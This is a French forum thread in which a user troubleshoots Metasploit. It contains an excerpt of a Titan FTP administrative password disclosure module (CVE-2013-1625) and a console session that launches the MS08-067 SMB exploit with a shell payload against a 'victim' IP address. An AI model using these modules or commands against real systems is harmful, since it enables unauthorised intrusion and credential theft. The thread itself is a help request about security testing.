Metasploit, un peu d'aide ne me ferais pas de mal !!
316079
Messages postés
16
Statut
Membre
-
316079 Messages postés 16 Statut Membre -
316079 Messages postés 16 Statut Membre -
Bonjour,
je suis sous linux. J'ai installé Metasploit, afin de tester les différentes machines sur le réseau. (le réseau et les machines étant les miennes bien sur) Mais déjà au lancement de metasploit, il m'indique quelque chose d'étrange : une erreur de syntaxe dans le programme (du moins, je crois):
[-] WARNING! The following modules could not be loaded!
[-] /home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb: SyntaxError compile error
/home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb:40: syntax error, unexpected ')'
D'ou est-ce que cela provient ?
Merci d'avance
P.S : J'ai été vérifier au chemin indiqué, mais je ne trouve pas de parenthèse manquante.
je suis sous linux. J'ai installé Metasploit, afin de tester les différentes machines sur le réseau. (le réseau et les machines étant les miennes bien sur) Mais déjà au lancement de metasploit, il m'indique quelque chose d'étrange : une erreur de syntaxe dans le programme (du moins, je crois):
[-] WARNING! The following modules could not be loaded!
[-] /home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb: SyntaxError compile error
/home/...-pc/metasploit/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb:40: syntax error, unexpected ')'
D'ou est-ce que cela provient ?
Merci d'avance
P.S : J'ai été vérifier au chemin indiqué, mais je ne trouve pas de parenthèse manquante.
A voir également:
- Metasploit, un peu d'aide ne me ferais pas de mal !!
- Metasploit pro - Télécharger - Divers Utilitaires
- Pourquoi la tnt fonctionne mal en ce moment - Guide
- Le trône de fer livre audio mp3 gratuit - Forum Cinéma / Télé
- Mon pc capte mal le wifi - Forum WiFi
- Le Wifi de mon PC portable capte mal - Forum PC portable
4 réponses
Salut,
Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
Je vois pas trop comment on peux t'aider, vu qu'on a meme pas un aperçu du code.
Sinon supprime ou renomme le fichier en question pour ne pas que le module se charge.
Merci pour ta réponse,
Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))
Extrait du code :
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',
'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)
register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end
def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res
if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end
xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root
srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]
Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.
Merci beaucoup d'avance ! :)
P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!
Mais à quoi sert ce module ? (je ne veux pas le supprimer si je ne sais pas à quoi il sert ;))
Extrait du code :
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Titan FTP Administrative Password Disclosure',
'Author' =>
[
'Spencer McIntyre'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-1625' ],
],
)
register_options([Opt::RPORT(31001)], self.class)
deregister_options('PASSWORD', 'USERNAME')
end
def run_host(ip)
res = send_request_cgi(
{
'uri' => "/admin.dll",
'method' => 'POST',
'headers' => {
'SRT-WantXMLResponses' => 'true',
'SRT-XMLRequest' => 'true',
'Authorization' => 'Basic FAKEFAKE'
},
'data' => "<SRRequest><SRTarget>DOM</SRTarget><SRAction>GCFG</SRAction><SRServerName/><SRPayload></SRPayload></SRRequest>",
})
return if not res
if res.code == 400
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded 400, It's Likely Patched")
return
elsif res.code != 200
vprint_status("#{ip}:#{datastore['RPORT']} - Server Responeded With An Unknown Response Code Of #{res.code}")
return
end
xml_data = res.body.strip
resp_root = REXML::Document.new(xml_data).root
srresponse = resp_root.elements.to_a("//SRResponse")[0]
srdomainparams = srresponse.elements.to_a("//SRDomainParams")
[0]
Deuxième question, pourquoi dans le cas suivant ça ne fonctionne pas?
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xxx.xxx.x.xxx (ip-victime)
RHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set LHOST xxx.xxx.x.xxx (mon ip)
LHOST => xxx.xxx.x.xxx
msf exploit(ms08_067_netapi) > set payloads windows/shell/bind_tcp
payloads => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on xxx.xxx.x.xxx:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Vista Home Premium - (Build 6000) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit failed [no-target]: No matching target
Que me manque-t-il ?? Quand je fais un show targets j'ai une liste de pays qui s'affiche.
Merci beaucoup d'avance ! :)
P.S: Et pourtant ça n'est pas faute de ne pas avoir chercher sur le net !!